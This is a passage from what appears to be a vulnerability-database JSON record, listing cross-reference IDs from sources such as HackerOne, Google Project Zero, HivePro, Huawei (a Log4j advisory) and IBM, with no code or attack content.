"BD1B0180-DA8D-5255-B3FE-EB6CBC730206", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE4B2B71-B588-5666-9A02-7855DBD45762", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BFB49B3A-706B-5625-9899-54FCB1EE767B", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C14C47DA-F04C-56CC-955A-FF12A410D2F5", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C306DCEF-59B3-5147-8169-3674490BD35F", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3C6029E-8A78-5C0B-9CF6-51489E455464", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C6493FD0-579F-593F-A1E9-A44793F70419", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C772DCBB-20D0-51DD-A580-F96689E65773", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C96865D9-B80D-5799-9EB6-DDF13650F0AA", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "CA13A26D-7A19-511A-B059-BE9AEDA1F2E2", "CA408205-D32D-5A33-B1AF-0B863641C7FC", "CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB", "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "CF3485E1-2E99-580B-BC50-D61EA587BA40", "CF96C0AC-16EB-57DE-B450-775CC256F1C2", "D02E385B-76D7-5BDB-A49C-CE858BEB0009", "D0B02251-DCA3-58B6-B887-D339C4EAABF9", "D107A97F-1C44-59AB-8FFE-803D1DC21EA3", "D1E393B9-589D-5A20-8799-0F762FD361DA", "D21F1D28-2C44-5969-8F84-E5C6FF67DCFC", "D2602292-4969-564A-915E-2EFC6661FA35", "D298A3C8-E215-5549-B1A0-D01215070203", "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "D52F3F41-2E8A-5FC2-AA35-BC6707158F1A", "D536CD4F-33F2-570F-BA34-54E141F1132C", "D58D53CD-D047-5570-B473-DEFF8E3B0225", "D64C04EA-093F-5924-A39B-714908D4637E", "D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9", "D70A4D0B-027B-57A1-B882-C70D16FCA9C3", "D72095BC-06C5-50B2-8F66-EC86811783D3", "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "D77EE79D-71A5-51BA-9A16-DC757F86CC50", "D813949A-183D-55ED-AF64-B130B8F95A56", "D8246B9C-AC86-5FFA-AA8F-4419E4CD07F1", "D9F6E4B0-AC2C-5A70-B795-360757BE02D2", "DA01F84A-9B1D-5337-A465-2A9AB088C056", "DAB5D6B4-8A2D-58C0-835F-DA4F27B2142D", "DB81B174-C3E8-5B08-80E4-A6D768400C4A", "DBBD6963-3870-5117-A829-3DE976AE90E2", "DD36D028-7FB1-5824-9756-09BA3927DCEE", "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "DE88B6AE-5D54-5B49-A097-57038C720463", "DECBAC7B-9235-5E00-81C1-142CD41306FB", "DEE433F2-3A1C-513B-AE6B-E11EFFB5A8E4", "DFF2F784-9ED2-50EF-B79E-3EBF5A9B5428", "E0452D6A-51BC-51F5-9C1C-6CF01DA2805E", "E06577DB-A581-55E1-968E-81430C294A84", "E0A2EF02-5087-5522-ABA0-52F4142BB87B", "E1457E6C-87A3-5557-A3F2-175005D2A765", "E1ABFD41-98C8-576F-8509-5541B40FD442", "E1FC5745-FCD7-58AF-9F4D-65D94090BBAB", "E278D22E-7EC5-5A63-ADFC-EDEFDC650AA1", "E34732DA-6DCA-54FF-8A7A-C1CCE3D1B1DE", "E4103A50-881C-52BB-86CC-27F549B798E9", "E4395A48-164E-527F-8B5B-1A44D3F379B6", "E4491698-477C-599A-A65D-EBA7441764E9", "E4E73A91-5275-59C0-AB2A-7F3EE83DDE28", "E51E8D61-BAA6-5098-9EEE-50DD18427F87", "E5280802-AB3D-5E96-83E0-97F22FB9EACA", "E59C9A70-6F3E-5CF6-9F15-B0039E0FBAF1", "E655806B-A2A8-5BCB-A30A-0120CA3E97A6", "E6B6EDFD-3B78-58CA-B507-093047F89BB1", "E6E03693-50B8-5AB4-B766-8464A228BA02", "E7177DCC-97D5-5A91-8A06-124DD3CB9739", "E917FE93-F06C-5F70-915F-A5F48A30B044", "E981B35D-7356-5A5A-963A-744545A4E51C", "E9B21C59-ED98-5B3B-A993-F1C214F8796C", "E9DFB8EA-B99D-5022-ACE6-5A42D0D6A350", "EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB", "EA3173CE-C426-5047-864A-480B1A30F235", "EA3C5D7E-0CC8-5AEC-8D7F-3C245A834DDA", "EA906824-9149-507D-893C-87A7FED8998B", "EB648301-A198-5E4A-A72E-9639ED09F6C9", "EC0987E2-0001-5D63-A5AF-09675A5915BD", "EC35769F-2EAD-5464-8F97-D90F768E1E2D", "EDDA4558-9527-5BDE-86E3-23DDD0BA5443", "EE01D764-5F14-5C0A-BD77-8E32854C5216", "EFD098FC-90C8-5665-98B7-79C96C6AEBAE", "F1D342BE-E1E0-5B33-A19B-E2EB9E3E7C80", "F1E9BE6D-4024-56FB-80BB-B10ED5889144", "F208D311-79CA-5A2C-AE81-591BA4D30750", "F2F2719B-7041-5D1A-A95A-7617360B1D08", "F32DF396-0485-5F43-8A52-31B8DD252790", "F388C84A-40DA-58BC-BE0A-74C7E1712C54", "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "F437A0D1-7913-51F2-9D43-8BC2DE62A636", "F493C59E-F2A7-52D1-B4B5-69CD3748C5E9", "F4C136DE-892B-5921-8475-E30BD548DDBB", "F50E9F2C-8C80-5A76-A993-A3E42414D797", "F523E799-3659-532F-8EED-40AD7F79E752", "F594470D-2599-5B2E-B317-C9720581C07D", "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "F8ECE1BA-CC33-5566-B57C-1AB243A48E28", "F96D1468-D4E5-54F8-A03B-503ABF9BC416", "FAF36735-05C9-50E1-B458-BA2E15B5EB99", "FB593988-2CFC-5828-8229-9274AC7B0F86", "FB65C479-F4E7-58BA-BC4A-AED04F10A11C", "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "FC455648-370A-582B-A03A-6299DDC272F6", "FCCAAA4B-646B-578D-8CE2-5439E7799C32", "FD364396-D660-5D23-8323-23248A5108C5", "FD65F47A-0B60-5F08-BFC2-1ABD16F49781", "FD6B81DE-3BFF-5BC7-BD1F-E90103B8FBEF", "FE6D7F99-F6AF-559F-93A5-786367B77158", "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "FEFA5AE8-5C94-5174-B44C-AC52B9AEAEAD", "FF761088-559C-5E71-A5CD-196D4E4571B8", "FFA2D3A3-AFD4-580B-8424-EE4844976B65"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1423496", "H1:1425474", "H1:1427589", "H1:1429014", "H1:1438393", "H1:1606957", "H1:1624137", "H1:1719719"]}, {"type": "hackread", "idList": ["HACKREAD:E34C6E8908AE56B0B1176B1237BFDF36"]}, {"type": "hivepro", "idList": ["HIVEPRO:04FABAE2F2B647B3488AA0025301D637", "HIVEPRO:0D02D133141B167E9F03F4AC4CA5579A", "HIVEPRO:205916945365E4C9EB9829951A82295A", "HIVEPRO:28A01D4CBC8A05BECFBA17B5AF4793F1", "HIVEPRO:2FBDBD20FF69ADDF5A541D1E5B3D0809", "HIVEPRO:310F7AA9457FF55D42E100B468844E6D", "HIVEPRO:361A2FB730C7ECAF024FD15C73EB6E93", "HIVEPRO:5339CBE01BD312A79B81CAAEE0F3B32E", "HIVEPRO:57EAE0D1FD9EA88C12142AFF641985C3", "HIVEPRO:753BDE83C1D82672DBEDB937144E1598", "HIVEPRO:911A69A767BEAA3AE3152870FD54DF6F", "HIVEPRO:A3588E2F7CB7E12883BF5D4F364E645F", "HIVEPRO:B146CB21244E67A8A5B49722A69EDFE7", "HIVEPRO:B25417250BE7F8A7BBB1186F85A865F9", "HIVEPRO:B4C85BEFF3E49468BE44E35CEC3A7DE6", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:B84508E062BD1F35232DF0CC7CDDC761", "HIVEPRO:C037186E3B2166871D34825A7A6719EE", "HIVEPRO:CA37C8D639BE8660B8996BB5FB4F3C0F", "HIVEPRO:E57DA2FED4B890B898EFA2B68C657043", "HIVEPRO:E73184FF060DA7208BAF888A5AF221EF"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20211215-01-LOG4J"]}, {"type": "huntr", "idList": ["82B8FEB2-2ADB-4D99-9AAF-3D5BEE80B19A"]}, {"type": "ibm", "idList": ["004795EC88EC224A6BFB93940B96344B4EB9FAFDD91D056225AB0FB24FFE6CFE", "00B8C97EE29C4817481434B7FD887049A0EA42C49E5514E1877ED97B5322DB16", "00CA973D0D5F4A08ADB77D27F66CF53D661D1B67B8DA263B3CE4522918A4CFFF", "0172701FE5FE7C060372C9A6E7199B0E91A4F7E5904E7762F54202A8D4CB9759", "01C1A66F149F6CC650556CCBE7E381780D3142691366A6B6EFBC8CD5C674BD4D", "023C54E1D297D5AA9E7F44F8089DE35CB079281FA1776467BF8B7A7AD4FE252E", "03991456EAB03B09B39DC9DB5C8BE4A51167523943AA9AE61168FCD6FBACC80B", "03FB798F067FAF41EB009C69979886C89AC88567ECBC9DAD159CDC2AB547C1F7", "048C762AAACAFC74604EFAB15A41479F902FA040758DF428CB364B0242E01EE5", "04D3658F043D6F4A2AA1B2F519A7E89C112641C7C4E2E58E14BEC11BA66E803D", "053134070CB8D6609B7F157DC74146FFBCB3EBE941406A677E889C3CAF773364", "05A1D58708802BF8C1674EE32BEC4344254929330218CAD68AA838AA7F549BF7", "05BBDE1FB03AC43275CE3464D408E5E21E63D250E7B0CF0E90D314FBD5991752", "05C0F0FFAAC20F511D50030C8EC7ECBE67EB162A7352C90C63F986E1F73F829F", "05C433115EE2DEF62DD69CA7C7E97FF424FB6D815F82B8FFDD0435DD323AC60F", "05DC2B42328B1D8271D4FF358EC4A58529E6A6A6B8D7E154A691EFE1CCE81D1A", "06543959E3F80611BA94C3105900D725FA079835346EA88779BC4F272E259FC6", "06B617CF301DC9505BA9DD5DB1C356FC3A1CCF92C2BD6C1F311F6B9EB8C0F85A", "07F48EB2EFD881D21294E1AFEEE704414B9605E4B9B1F4BF6C82B1917372C2B8", "084618FE115DBC963CDA469EFDF156D77B5FAF5BE04B99575716D75AE5C42F9B", "08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6", "086B39C8EEA9E80F827A72EB837BB35072FC75FA2EFB8DDEC667E6F0D07BFC82", "08803B708D4CA95FF8DD68A4DE7FBE7DEAA67387194E25D8CD693B135E7332D9", "08C5ED1F3E47E1FABE2752DAE40446E385D6C5EB30C70D7C739509CE04B06788", "08FF14BF18D2D8DEA2BCD9900A4BED9C481C9700F7CF99B6CD1B3F7EDA9C3865", "092A442A77CDFE46ED83F2F7A7AEC07007442443AE7B6D28BB557D1A8FE3BBB2", "09E2EB771A00246F88812FA7239EC135B4D760017A61975C9C7DFACAB2B566B3", "0A50FDB1D7E17C09815A2D06C237539FFD67E23789BDD9A730E5EB3DD9473349", "0A6CCE42A31E930F28AFDE0602BBBC571E0114C6DE44000B246AC3D8A844DE39", "0AE80E7D1B92F5584C0652988A6BC58F1CE1E37349CB543C23A7BCE8C2445CCD", "0B0C1C8C8CE115B4178E3F36D545ECA410D6199928FD71C89DC4DE93BB9DDD9F", "0B62A979A39E5FDD103EF50E44280DC84E1DA4B8937991D39D2F70B94DE5CDC6", "0B7D327E5943F8BAC5B2E5CC855F0062D08A51BF03FA3BB29C4B6E081796EE73", "0C1804CEEC31BC3891CD11D25C3FF5366F208C6C862263628223F5F36164CF5F", "0C5DF0032AED817AD90450244E2BACA3580BEA79A5DBA7B84BC329B4F1B22585", "0CF13F8FB4FD77C6593C265FA8F397D0C4324FC1F07F86C436B4937E98B25DBF", "0D6234D366BD8E5B02C4B7507046A503B63D0B4B38E06DEEBC5B6B98A5E2C80E", "0E0248E4E7C78DC0F137D1A675D47FF40D0F4EEB2A876D0083EA60DD92CFF303", "0FEC88A4274D91DBFBCE46AE5EAF1CC67B908E3D943BD3504E2985D9090BF93C", "0FEF4738C59C97322DBD25A9806D1EE3E131F117AF9CA9C33F3A6098A981AE66", "10DF4536D86919652FFFFF08E8AC284AF696E6684CAF921DD9F5AB335A3882A9", "10DF54AA6E02F56E5A696B90CA92AA8E0E7F033CECD731E6AF976A827BD42316", "11FEAADF6A94DFB6615A82EE0023D346C418ECD114C445A6BA52D50AA2C6FE0B", "127C76472291CDD3CB521ED83F3C5EE611A0DBD9FFDB39D76C830FEB168F09A4", "129CE78870CF5A56320BA28A8E839DC00636BEBEF434ACBBC173D76B086059A6", "12B5FC796651D7A35DCF3B8B99675B867D7E526A689762A16A5B6315936577BB", "12D6D8D7F99A3B7D0C4D8EF9EACD0CBFC5BFAF207DEEAB323ECC16AD5DD105C4", "1310B3EFA1CB8221444DBC5BA49E64CF94DE9CAEC7263EBE35877FDC59E5AC3F", "1344237EA4CB2FC0E4E886077C19B07F9DB7272438002709C5CF339D588A226A", "13F541CB7E471297DBC119C027DC6613DDB93B7E6EC8CAAB1918D4F75B9B0A25", "1449AEBCE14C7A0A52FEC9AC77DB499F51B4D1779EECBB859DE1E3343B21DE81", "1564B346628009160A0396828F83A178C5F24808FA0E2904A4DA0F9DD72C42DE", "15A287A106B845D07333D01887C3D8023917F0A2AED2934387D8904CA8A42DA3", "1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3", "1718BBC548F6B9290910114BC5C00A77714052D125CB0F46088F37430F68E717", "1827A1B8985F4A2B91EE262D4C17EF01B71CFEA86DB0A386BD1C1B098E2F4B69", "18433120583E82C639DDC6BF1D76EF365C9C500B0A9CC0AE663BA4BE32DC9232", "18578ECA481CB003C14A84CA7A47ACA060F579C24F4075A776AF26B575502960", "185EAAB4DDC8472DF44603A1F8F5361C61E9CD92D640BE3D1EC6D31AE959C4F0", "18A47CF24DAFF468D1B3E48E56A7C723BAAB5077F0C1ED2DC22653DD05320A38", "18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5", "19613990614CDAB7F34154F3A620BBF18E7F15F79F3D35FBEB7EC2FC9249AD2C", "198E2723EA7A1CE1B7B95165E39923D5EC8AC5F2D17849CEEDD3695D8CF40623", "19BDC8BC083D06551FAAFFE502D5430968A9B28E5C71827BCFA873F30BA60815", "19DD6BC826C8BB8D144E5985E9EA9E8E00533CC7AEA127F00BAC78AFBE98ED00", "1A308C90CA9D34C9787724E32DAA927E0CC6F10A74C5CF15E523AAE37176CF1C", "1A98F50E1E735698FFAC4C9A1C23F5B7F50E375BE7EE85508BB03FE656980855", "1AEC66B946906A8F4682C35B7C619499014756DEA99B2673B7DD17DB8DFF256D", "1B24B80EE0365FFF7DD17D658867C0FAF5A2D298D0CEFC01C750A9D3A2948965", "1C6CC8129E7AEC5C314CCFD7570FC09548438820946E9774FD2E2410C0897958", "1CF787D3495FD84D3FB0E74685765A4270075CE576D888A960036582B4F83133", "1CFF840C0308591ED858D48151909C9A66A9C154B22BCC3BCF7A195C153D3C69", "1D0962C2DB9E45A67BD8161410DDF953960E39C9E80BC2FCF317962372317FA7", "1D2ACD2E26FAAB07F4713510046DB56AE9A2584306D1B3C884E18DC47771F892", "1DC1593D1836D1525D6F440ACE74DA3A15D40CF4DB29276718503CD58BB74D54", "1F4AD6C45C3008DFF01BE9EE1718E1541E761D5A4D77198ECEBE3A97CBCEF6FA", "1F6B1F3D85A0CCA59E5FCB54F755C559078C8064F36F920EB06BEDB03C8098C1", "1F7D1DABE3F10F804A14788D638556B04F5D5038E1088B9F38B3961987623815", "1FEF4B25F870CF814735A38118457F007D958810ADCF7C8C553468619FF1337F", "2042D81324560EA3A6747DAF5E2633EFD4EC3C4BB62989E7EF2C6A1F73035677", "207BA1F7EAE0F24909102A8E9F71F4E090F16E370A882E1CE68B1B6EFB5952F4", "209DDCAB6F475A868DA84DD19D31132027FF62B259B6541CA0C9859AD7CF6ED3", "226444D26451741A120880149A9CA946711043C9063C8B5E2B0A7FB4B06432D9", "231A52BDE442B2AB4C8738E8A5DA147B21BA8A7C7B8F0AE7764349AD467647ED", "23532FC7488A1E0A5525D86FA8B58841ED6086B69C02A7FBB104B3F98E2ED3CE", "23980F37EDFBF5DFA892E9152EBD5E349FBE79FB2A858C312C9DC9251022F872", "23AE54815D4CF73296F6842E5DC0E74807A9DBD435A1F78F1FCEB4A6582B9613", "2554E8D81F677D7B6EBC79FCE40E258FEF8A6F105FAE62A81A45E3FA65DA6631", "25649DBC7E3256428D82B855B8B2D096C91EC2361653C508EA395A775FB57C82", "256D7977365CD514F903FC0D0240FD89D47444B078D35EB3DA4DD54AAC8C8661", "261D21204C9E2060DE70CAB5932236C5EFB2EE37E8BD5A2C64CC6F1DFE9C5D11", "2709A19D29B9047D230E570EBF5F26A53D322D557D88CBCFB480F1AFEEF6797C", "28932A2B46E12EA86EB64762E53A114C7EAE97254E4818FFBB7E3706DCBD4C0F", "29D0DF01470BDC8419B05A248E7472C3D66A25942620A36BE340FC58780F85D4", "2BFA66DE8BFDD06377ECA828C11F053F870F48D77EA53F9FE38F929F24A8C66E", "2C91E3B2FEF04BCEF23F12290F03A43D58EEE4E79946072B4CD9E132F31D3891", "2E43FFB94818B9FA5C94DA88B4D321908359974CB3975DC266C2CC995ACB39F3", "2E5E4B8C9F62EA8A0096E1C9AFF46DB81567BD911FF8F4EF57BE5F2BFBB0FE98", "2F83AABA00B663AFEF63A77633BECC48724170228D80CF284B2FA6A8E71FE2F8", "3013E3EDD3900D973C5458C7115888BA961C479A9EB9DA6399CA9B389B37A68A", "30495EE9B3C48AB51AC589D2A5956D977474A3BCCB9A67B54801DEE7685C5573", "3092B1C0BAC8BA0F65979D37C5545C23B95C45DF35290A26827618ACF0E8B4E8", "30A0E9F889B3548B9BD0339A7DD9F4F3D51821FE906234D247C17BB05B831873", "30B9050919D7C39431AC5338C16936C21A40D07623E5A2722246A5F91B5C6781", "30E9FB4250193CA2C5AB02F5095C96F34F2044E06280324E18E38EEFD7C1490E", "31818542FEE3EBA05F196E3245AADB3A27506A9391A7E39DC666A3A5AAEE4963", "3220BFD68D0CE5B97E4EC49AFAD94FC9317DA5DFDBD73C624B022C3E93AC4268", "342C70DE6943237DCB4E2BCA66A117A8AC4A929DA3631A2BB88E27D99C1A1F68", "34A1BC83BF19906C7B478BA74801364559DCACB160B8635E7EB96D184FEF89D3", "37DEA24D462A4FBAFF5F635701ADD4D7975920B040324F41A7D2C11D55FA659E", "37E4288762F4137CCB40EAF6740BA95099EFFDB0B7C1A2F36DD293FE994929E5", "37EB0FBFC18EAA8CBA405BA4A0486007287891F661D591E70F8DFD893065763F", "382442D01890BE0F397DB0132A6B09339C6A137724C837A5E2907ACB61EA374D", "3828A20846DAD245008B2B65E98D8C5488EDD3BEE6195D59400F18E61B82C570", "393A985D4478230C9D2C42E9A4B6209E9A8A450BC8302073A121E3B160C57EFB", "3976D01F8C3788737A665B8B2C67DBBC91A5E249602308AB620D7FB7082293F3", "39C439A440712A8825FAF249AE9256D154F422331B554EA4FEF0A1953F90EEE0", "39D96B14EB572D15D163E89AF8FFEB5DBC072EF6E833A83F8DA3B89A5DBB7F82", "3A9B55763C1C0473228A4D4C82FC501C0EAAF3C51E020F75A80CE6CD65CC662F", "3B5CA39475D73EB1F673FE6D208449037B7B188E0C5761C0C18099C77DD55CC2", "3DD98F75D577A590F9C6B1044AA5212C3724660A7C7FB06B6DA4B25B95BAE35A", "3E89F6F868ACED4017A55BB54A40658D10E6704003F50ACBCE289C1637B41045", "3F108F67BF1C0CDF3357048A55D6F542375A28F355F9359FDBF6A3EA00B3BE23", "3F14338CF5893CE4D24AD3EA652BF863BF887AD4702C8D62827FAF3B7BA35B48", "3F22D484EEB21B0ECFBCEC72BC808CC13691870E90AFA5724963DAB7B31EAE45", "3F4820A3C64022355AE6B658B22CB04D75AF98980AA0D9E31E518E440502939E", "40793F706E8E7D40E73D53F66523BA8AE8718C40C00FCEF117CE8DEAC4566FD6", "4204EAC341D63510AAFE13D5F22BA14E92396D43569176E371BFB452611D1A97", "4271B86469CFCE465E783BEC3C9F3EDD13D645F55A5BEB697F3A4FCF694E568B", "42CCD08061313E58CD6A73C8392806C80452EF564A9B5297EAD78887E47150D7", "42E2A358194D10969A587E1619263DAF26CB9ED7B107D2DF24882326792073A6", "42EDAFE6D8936EF20A9D2196EA720167F87C6E003FF3677093C777BD76F87321", "4444CE19278AF3B6D6D733CB7C56652494A379ADDF5788A2D704DCF2AF8B12B6", "4490A508C76B3478285658D50CD1591EE7BF09C6C6CB543CD3B4AD02093F6106", "461D38744E2383701381659B3FB9C7655B5271B60CDB145B8DACE60D09C17665", "46D17052F3251C0B3D153FDD5D0771739B636DF3179C7B0E07B10BDA68CED334", "472B90C1832448CA528B9FB0B6A4E81CAB1388397DE753F5CD640C5D7396EC9B", "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "4AE1D41640E1E1F9FB5DBE7DBF0EE0C2ACA27C0ECF4C914440CCDB95D27308F5", "4AF3F2925FA2FAC4247303F748E1EABFA2DFEF4045F7C3DA1E06B8C833F40639", "4C80B96CCF860D1EC965D20D607161A663C8FEDCCC81B5243439A21264518261", "4D6D019876F2EE83F308FCD9E27F7FE176603A605EC9CDF1DBCD5C5C9951EDE5", "4DCA21B56FE99A5E5A697112CA49F4F2144DF92AA26A0776EAADF3EDAC9C9053", "4E45A4CCE496D5E81C322B32A8275068E422B799EBDE7BAED299E58F52295C89", "4E7048D2949BF25810D29EF0126BEB63CEE9FB2EFA940D8D15F1A2EA9579215D", "4E77D6807CCB5F39F0079A9612FD44F47C18AEBAF1D9AA7EBBCB816C3FD025B9", "4EADDF94DBE666E2A4821F37D1326BE41E94E92E6E6B1A8834D7F3C47C803887", "4EB30F982289A93326697168C61CCD073ED91E21FFACB7414B6EA10DBFA0E2B0", "4FB8B888437D1D3BA8267655720E593D70AA3798247EDD900F18FB420753B17B", "4FBB5FAC2DC58E004CD52875DF4CDC0625DBFB20A2AD61A597C719C2C2B0ECAE", "519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C", "5386FE1271B599B35C07E4CE74602B34BFA6835496174DF0B19F0F6517DF425D", "53949D71EE0D6BBA6C433F4DE402EC6D1ED7AA7877C8B84C15AD5E27FFEBE24E", "53D2631E5E76894870663A2B4948D3A4F72BDEEDF8C87935B788F981BEE5852B", "548C926066F6AD2176268ED770911E39A8F8EF2D79582E0A4D8DDE7F34549084", "558ED6F880AE90E6CA233933ED947E6F8B2EFF2613CBD4FECB6553DBCB9609BA", "55BBC53EEE4090294470AC417A4B8BDE9A26DF232DDD5FC327A46034AF09FE38", "5662007982BBB6B88D91C6C7393CC2022D9415D2290FD0DA76D55E99204FFF35", "57C8014122573615025590EC2ECB0090790833D51A381D781A55C4F43EDA278D", "5815FB6A93B31EE44428DCA7206EFD79ECDE693494B2D5F28EA2CF1909915C77", "58868A8A56E187AE7CFDC0168A9534F5C483AC0F042B7ADF09CCBE3D8A901101", "5933EF8E3015054BC951DB682E9526300B741E8D2A0F7151692088DF8A1C8A68", "59E669B8BB67D676E7382F77EAD621E08DFCFBF626C52F337A77A33EF6F33748", "5A77C3590D23BFD85FBC46CAC465870596841D78EFCD8AD2320EF501E87B107A", "5BB3B8EF53C6357C441C8592F64A284C30E9C1D6F5379087C40684A770A870AA", "5C1515C744F7537118B0717D85B52611810BBDF6206930989FA3E05682B9BEC8", "5C2309A832A981E871A38D52C9E19A6D60138A5FF04933E55F3319A964A350A7", "5C4285711D841C9680531DE8ADF4E9F871797CE3D4CE7073D4D1B7D69166DABE", "5C78D16785206BA3DE0656E1DA67E30BC720F22BB98882FCD6029110F7F105E2", "5CCDFC397B134AA5DCE5EBE10022C85B3EE99DAF9D679B25DCCA69CA3D851EBF", "5D4E57B88DA114CC1637B260294F38F53CF8C7CCF19B1E4FEF1E5735A6EC78DC", "5D661EA5B801079F3B7AF6D31A8566154E3150C1E3398EC1CFA32E9398BF38D3", "5D979AFFDF974F2910D0CF8FD15D323A264B0745C0ACF5B78092630C5EB271CE", "5DC028B7AB8CCCA9FD3F109B69D7F7AEBDC718A32C0EC71E5693C99FFB06466E", "5E0D2EC541C3D2FE5413DA829783950147FE05FA866060FB6B6B557BC4E00A16", "5E46685CCFDAFEF52C3BC0BE649F5DFE9485392CF7A7733CC64B02CFBA707DF4", "5EB805FBA32A419246DDD86FFCA6C34246C092FCBCD8608B3ABC4B0A77FFDAA2", "5ED570DDC2DC18EDBE3A6F896450F75892C392B6E12D967BD6C8F6E5EB0809E5", "5EE7E4E97581573D0B40454E7851D662668050B8C7587DA918FD85D38B92C2A2", "5F1A8E5DEF8C5B0BD8A337785BC9EC92521E4E1FC191BC80CFB2E92B4BEB7686", "5F247DF8011234E4C8E9F5DA1233AD5131F7718B99D13FA0E448AB8545E5E6F8", "5F24F58173ED799EACD7F7DC971D2ECB62B80971453D92D5DB9CA708526DE3A8", "5F61B9F9A964CB3CBB554CD28E3CE9FF36CED8CD1357DB2E45299E1C329C251A", "5FAA10ECBDD6BDD67568DC782206BEA34BD7120E44FD8D30001A968A438E5C77", "60679F1EB565A827FBFDD72C9C325755586FDA1F0AC78877A6590DED78230E66", "628B14B8AA20DB98F73DABE8C7FF0C2746646BE602A0BA4F638FBEE3E634C393", "62D22CE7464E30931544D86043D72A241CA4A2ED1A6F28AB59EEDEFFCBBFFAAB", "6305882E456CC7111E361249970AB42E196A23084AAFDDE2E82B0694295074BC", "65B30A5B63DE43E789127C5F5AD2977C7194142636581876B7BA2AE224B6420B", "6631C04F89A8D2ED4BC1256E62C3AB820EB5DE675CE6766AA9AFAB238EA92F40", "6655F0CA454D34B530E468D672328E7DE915E373D5DF7A2E41376F7E2B588F5F", "666E4FBDA68F1376E7E84944B116ED00320BF80162EF68755AD1CD31AE358231", "6741052F2A7BCCF76F84825C9FE706D98BCF279A0C055A783796DC802C323E13", "674DDEB58033DAB9D03ED4483C0C1118FD09DBE69E73AD0AAC428EBFC61E2474", "6758FD589A76487DB6421ACF317F7E42F52C2C62336F671B43C2B523483BF57E", "67A6DAD4F7DB5EFA4D058E5FA0886E6D1185C31EE7AFA1B194E5CA4D0F4A3F5C", "67B2FFD11F790787A36E0394080502A01EE907D975E33ADFF6E931A0E15B05F7", "67D7A2AD6D196C643D91F066E834B1EB9853338990881AE1012D2B5186629622", "67EEDC4E808A4DC3E092C0FD2F6DFB5714B1E7F2E2ECD7CE2F8B2F65F2D2B26F", "68F256DC5E144D5A2404101E56A66160645897F9BB7E8600047077C626B2FE43", "6920277579A35875812264472A148A4383E98310C21147950644BE922AD17700", "6A43E45FE98A49A0127D4FD81A7F70BC513609043DDA830926C4CD80286B1A17", "6ADEAF325A5B46B34D6E419B67D91A45C9FD7E4F02587AF0F33D5FF933653E27", "6C6D0940826336DDE7832D99EA3E6BDC3CE6950B9638280B5C586B4770666429", "6CB020CE84694787BB12E05DCB6CC95C33681B735ED0D48ED68FF5A99DD1D7A4", "6CC386F9299ECFE5F62C9D0954CED9917B32A3DFEB8BC98C8212D83DD7B53DF6", "6DD517DD7F557A31BB9EF8B8E2970701E7EBF9E1168A77A02C5EFC57A29C1AE3", "6DF2E72D03F9AA8435A0A58D154D82EDF5203309F8C81C42E35CBC71D2A79BDD", "6FBF074F8D8E8E6000FCF6488B84CA43AEFB7DEF10B2CEFF0E7D0AE1140ADA41", "6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1", "7061882A844BC1B159CD9483EEA32DBAF5175CB9800976F7DD1F381723E88538", "7156D43131599F71B03A8F8BDCE4755976A54F82BE32B0AEF105D1E6E781F384", "7295DCCE494A2CA195C0EC2BD4F052B62F3E1B45826D03ABBF986B81F58BDD31", "72E392728BCA627E900CA46B892A2B86465C877D468139416A39573D2D6C73F6", "73781BC7A0CCEF128DBC5E169F177E52BD5AD843F08787EBE0E19CC9088C2FA9", "73EAFB98AF656367DD4CBD6C4D9BDB98FBF39B358F625D93589F37D52771AA8D", "745004E6A8DD36244AE3AE2E238FB3CA9F40B885C5F912CA9FBBD7A9FEE76248", "7473C0056DBBEF7C541ECDFB31E947DC1520282F5E0172B7C965A9DECA661856", "747C7023F8D283A88FE9778F37629C7BF2E2A7E5268A695905F9F28590BF76D3", 